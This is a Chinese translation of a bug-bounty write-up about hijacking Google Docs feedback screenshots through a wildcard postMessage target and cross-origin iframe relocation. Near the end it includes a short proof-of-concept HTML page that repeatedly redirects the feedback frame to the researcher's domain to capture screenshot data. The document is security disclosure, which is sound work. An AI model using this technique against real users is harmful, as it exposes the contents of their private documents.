详解我如何劫持 Google Docs 截屏并获得奖金
我可以利用 postmessage 配置不当和一个浏览器行为劫持任意文档的 Google Docs 截屏。
谷歌的多数产品中拥有一个名为 “Send Feedback” 的功能。如这个功能的名称所示,当用户遇到问题时,该功能有助于谷歌获得用户反馈。该功能还提供了一种选项,可为截屏附加一个简短的问题说明。
由于在多数谷歌站点中都是一个常见的功能,谷歌在 https://www.google.com 中部署了该功能,并且通过iFrame 集成到其它域名中。
我们假设使用 Google Docs (https://docs.google.com/document) 提交反馈的流程:首先,导航到 Help--> Send Feedback,之后你会看到一个 iFrame 弹出并魔术般地加载你正在处理的文档截屏。由于该 iframe 的来源 (www.google.com) 不同于 Google Docs (docs.google.com),因此要成功地渲染该截屏,肯定存在某种跨来源通信方法。这时候,PostMessage 就派上用场了!工作流基本应该是:Google Docs 通过 postmessage 将每个像素的 RGB 值发送给主 iframe (www.google.com)中,之后将这些 RGB 值通过 postmessage 发送给它的 iframe (feedback.googleusercontent.com),之后从那些像素中渲染图像并将 base64 编码的数据-URI 发送回主 iFrame。
该进程结束后,我们必须为该反馈写一个声明,并点击,将带有图像 (data-uri) 的说明通过 postmessage 发送给 https://www.google.com (提交 Feedback)。
理解了这个功能后,我最初的想法是从沙箱域名 feedbackgoogleusercontent.com 中找到一个 XSS。利用该 XSS,我可以劫持像素的 RGB 值,渲染该图像并窃取截屏。我之所以很确认我将发现一个 XSS,是因为它是一个沙箱域名。但事实并非如此。尝试数天之后,我向 S1r1us 求助。我们花了5天的时间尝试寻找 XSS,但均以失败告终,遂放弃。一周后,我发现了 fieldescriptor 发的视频。
观看视频后,我学到了一种新技术:你可以更改位于跨来源域名中 iFrame 的位置(前提是该域名缺乏 X-Frame-Header)。例如,如果 abc.com 将 efg.com 作为iframe 且 abc.com 并不拥有 X-Frame 标头,则我可以使用 frames.location 将 efg.com 更改为 evil.com 跨来源。
现在,我正在思考利用该行为的方法。如果我尝试将 feedback 功能中的这些 iframe 替换为我的域名会发生什么?它会将postmessage 发送给我吗?我决定尝试一下。我尝试用 geekycat.in 替换 feedback.googleusercontent.com 域名,但失败了。
虽然将数据发送给 feedback.googleusercontent.com,但发送的内容和下面的差不多:
windowRef.postmessage("<Data>","https://feedback.googleusercontent.com");
因此,即使我更改了 iframe 的位置,由于 postmessage 配置中的匹配不当问题,数据也不会发送到我的域名中。绝望之下,我尝试将 (Submit Feedback www,google.com) iframe 更改到我的域名中,这次成功了!为什么?
关于提交反馈的最后一条 postmessage 的配置类似于 windowRef.postmessage (“<Data>”,”*”);由于不存在域名检查,该浏览器愉快地将数据发送到我的域名,使我能够捕获并劫持该截屏。
且慢!我说过父域名不该具有 X-Frame 标头,但我是怎么实现的?幸运的是,Google Docs 并未设置该标头。是的!它仍然还未设置。在向谷歌提交点击劫持报告之前,会注意到站点部署着一些防止点击劫持的其它保护措施,在嵌入 iFrame 中时多数选项被禁用。
这种行为见如下 Liveoverflow 视频。
拼在一起,就是:
<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);
function exp(){
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
</html>
在将 setTimeout 设置为6秒后再调用该函数是为了提供 iFrame 加载的时间。另外一个问题是,只有在用户明确点击 “发送反馈“ 选项时才会创建该 iFrame。因此我们必须每隔100毫秒就更改一次 iFrame 的位置,即使它并不存在也是如此,以确保当该框架被创建时就会被劫持。
谷歌发布 XS-Leaks 漏洞知识库
对 *.google.com/* 产品进行大规模的 CSRFing 研究,意外获得3万美元奖金
https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/
题图:Pixabay License
本文由奇安信代码卫士编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。
奇安信代码卫士 (codesafe)
国内首个专注于软件开发安全的
产品线。